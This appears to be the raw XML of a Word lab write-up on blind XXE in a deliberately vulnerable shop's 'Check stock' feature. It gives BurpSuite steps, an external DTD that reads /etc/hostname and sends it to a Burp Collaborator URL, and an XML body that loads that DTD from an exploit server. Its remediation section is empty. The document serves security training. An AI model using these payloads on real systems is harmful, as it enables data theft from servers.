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B91C" w14:textId="1FC5D7A4" w:rsidR="00320924" w:rsidRDefault="009F1CCE" w:rsidP="00B36D89">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2844B8C2" w14:textId="648E6DFB" w:rsidR="00B36D89" w:rsidRPr="00EC3CC6" w:rsidRDefault="002D4948" w:rsidP="00DE3034">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application is vulnerable to XXE out of band interaction as it </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4948">
        <w:t xml:space="preserve">has a "Check stock" feature that parses XML input </w:t>
      </w:r>
      <w:r w:rsidR="009F6B4D" w:rsidRPr="009F6B4D">
        <w:t>but does not display the result</w:t>
      </w:r>
      <w:r w:rsidR="00DE3034">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005D3446">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00470E74">
        <w:t xml:space="preserve">We will </w:t>
      </w:r>
      <w:r w:rsidR="006E1C83">
        <w:t xml:space="preserve">try to </w:t>
      </w:r>
      <w:r w:rsidR="006E1C83" w:rsidRPr="006E1C83">
        <w:t xml:space="preserve">exfiltrate the contents of the </w:t>
      </w:r>
      <w:r w:rsidR="006E1C83" w:rsidRPr="00C77580">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/etc/hostname file</w:t>
      </w:r>
      <w:r w:rsidR="005E3653">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5364B1E4" w14:textId="77777777" w:rsidR="00B36D89" w:rsidRDefault="00B36D89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743CB22" w14:textId="427C8B32" w:rsidR="00B36D89" w:rsidRDefault="00B36D89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1CB7B99E" w14:textId="7A6BDDEC" w:rsidR="00A0135C" w:rsidRDefault="00152623" w:rsidP="00455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Open the web application and visit any product page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B241700" w14:textId="700C3741" w:rsidR="00CB17DB" w:rsidRDefault="00CB17DB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Send a Check Stock request and intercept the POST request in BurpSuite’s Proxy tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F1EFEB" w14:textId="7C2CB5AC" w:rsidR="00146D95" w:rsidRDefault="00146D95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Go to the exploit server and inject the Payload 1 into the file name field and Payload 2 into the body field of the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6705C50C" w14:textId="625D593A" w:rsidR="00676748" w:rsidRDefault="00676748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 the Stock Check request try to study it and based on that we will craft an exploit accordingly and replace the XML data with our Payload 3 and send the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5553ADDA" w14:textId="46910823" w:rsidR="00E1363A" w:rsidRDefault="004F232A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Replace the XML body of the request in BurpSuite’s Repeater with the Payload</w:t>
      </w:r>
      <w:r w:rsidR="007F52EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and send the request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7781895" w14:textId="24A79C50" w:rsidR="00C36F78" w:rsidRDefault="00C36F78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</w:t>
      </w:r>
      <w:r w:rsidR="00CC224F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">click Poll Now in the BurpSuite’s Collaborator Client and we see that we successfully </w:t>
      </w:r>
      <w:r w:rsidR="00DC6F94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">forced the application to make </w:t>
      </w:r>
      <w:r w:rsidR="00CC224F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">an out of band </w:t>
      </w:r>
      <w:r w:rsidR="003D6F3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594D30C3" w14:textId="172EF399" w:rsidR="0058146F" w:rsidRPr="00E1363A" w:rsidRDefault="0058146F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can go to BurpSuite’s Collaborator Client and in the HTTP request go to Request to Collaborator and in there we find a parameter named x and the value of that token is the secret key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18405899" w14:textId="77777777" w:rsidR="00A0135C" w:rsidRDefault="00A0135C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3C86D1A" w14:textId="5DAB2FEB" w:rsidR="00A0135C" w:rsidRDefault="00A0135C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58BCAABD" w14:textId="7E3AA26B" w:rsidR="00595F51" w:rsidRDefault="00F14089" w:rsidP="003056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14089">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/exploit.dtd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3F9DB9" w14:textId="77777777" w:rsidR="00CA16B0" w:rsidRPr="00CA16B0" w:rsidRDefault="00CA16B0" w:rsidP="00CA1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A16B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;!ENTITY % file SYSTEM "file:///etc/hostname"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1692740A" w14:textId="77777777" w:rsidR="00CA16B0" w:rsidRPr="00CA16B0" w:rsidRDefault="00CA16B0" w:rsidP="00CA16B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A16B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;!ENTITY % eval "&lt;!ENTITY &amp;#x25; exfil SYSTEM 'http://hxing0ff9krozp0kjodpp70nrex7lw.burpcollaborator.net/?x=%file;'&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7A4F18" w14:textId="77777777" w:rsidR="00CA16B0" w:rsidRPr="00CA16B0" w:rsidRDefault="00CA16B0" w:rsidP="00CA16B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A16B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%eval;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C195B58" w14:textId="6E390CAE" w:rsidR="00A45143" w:rsidRDefault="00CA16B0" w:rsidP="00CA16B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A16B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%exfil;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2A4AA1" w14:textId="77777777" w:rsidR="006F6440" w:rsidRPr="006F6440" w:rsidRDefault="006F6440" w:rsidP="006F64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F6440">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7DCE3E" w14:textId="77777777" w:rsidR="006F6440" w:rsidRPr="006F6440" w:rsidRDefault="006F6440" w:rsidP="006F644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6F6440">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE hacker [&lt;!ENTITY % xxe SYSTEM "https://exploit-0aed00e904f0d91a80ff1b030121008c.exploit-server.net/exploit.dtd"&gt; %xxe;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438F5EAB" w14:textId="675DEC80" w:rsidR="00CA16B0" w:rsidRPr="00CA16B0" w:rsidRDefault="006F6440" w:rsidP="006F644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6F6440">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;stockCheck&gt;&lt;productId&gt;2&lt;/productId&gt;&lt;storeId&gt;1&lt;/storeId&gt;&lt;/stockCheck&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E739F1" w14:textId="77777777" w:rsidR="00760ECD" w:rsidRDefault="00760ECD" w:rsidP="00760ECD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CCF8D0" w14:textId="5DF26A5C" w:rsidR="00595F51" w:rsidRDefault="00595F51" w:rsidP="00760ECD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C8CBB" w14:textId="77777777" w:rsidR="00595F51" w:rsidRPr="009F1CCE" w:rsidRDefault="00595F51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595F51" w:rsidRPr="009F1CCE" w:rsidSect="00586A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D1C44"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A8F2CEDA"/>
    <w:lvl w:ilvl="0" w:tplc="E8021A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84E4B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B87AB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71290">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="121019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DD"/>
    <w:rsid w:val="00050FA0"/>
    <w:rsid w:val="001464DE"/>
    <w:rsid w:val="00146D95"/>
    <w:rsid w:val="00152623"/>
    <w:rsid w:val="002D4948"/>
    <w:rsid w:val="0030568B"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="003D0738"/>
    <w:rsid w:val="003D6F3C"/>
    <w:rsid w:val="00455916"/>
    <w:rsid w:val="00470E74"/>
    <w:rsid w:val="004F232A"/>
    <w:rsid w:val="0053631B"/>
    <w:rsid w:val="0058146F"/>
    <w:rsid w:val="00586A86"/>
    <w:rsid w:val="00595F51"/>
    <w:rsid w:val="005D3446"/>
    <w:rsid w:val="005E3653"/>
    <w:rsid w:val="005E4E23"/>
    <w:rsid w:val="00676748"/>
    <w:rsid w:val="006E1C83"/>
    <w:rsid w:val="006F6440"/>
    <w:rsid w:val="00760ECD"/>
    <w:rsid w:val="007649DD"/>
    <w:rsid w:val="007F52EB"/>
    <w:rsid w:val="008061DC"/>
    <w:rsid w:val="009F1CCE"/>
    <w:rsid w:val="009F6B4D"/>
    <w:rsid w:val="00A0135C"/>
    <w:rsid w:val="00A45143"/>
    <w:rsid w:val="00A672AA"/>
    <w:rsid w:val="00B36D89"/>
    <w:rsid w:val="00B45E18"/>
    <w:rsid w:val="00C36F78"/>
    <w:rsid w:val="00C6154A"/>
    <w:rsid w:val="00C77580"/>
    <w:rsid w:val="00CA16B0"/>
    <w:rsid w:val="00CB17DB"/>
    <w:rsid w:val="00CC224F"/>
    <w:rsid w:val="00CE0A2A"/>
    <w:rsid w:val="00DC6F94"/>
    <w:rsid w:val="00DE3034"/>
    <w:rsid w:val="00E1363A"/>
    <w:rsid w:val="00EC3CC6"/>
    <w:rsid w:val="00F1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2E43"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{61D4380F-4A9B-4EAE-B2F3-FCA29CB6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ECD"/>
    <w:pPr>
      <w:keepNext/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0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D89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36D89"/>
    <w:rPr>
      <w:rFonts w:ascii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5E4E23"/>
    <w:rPr>
      <w:rFonts w:ascii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5E4E23"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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559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0ECD"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs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0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23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-03T05:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-03T06:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>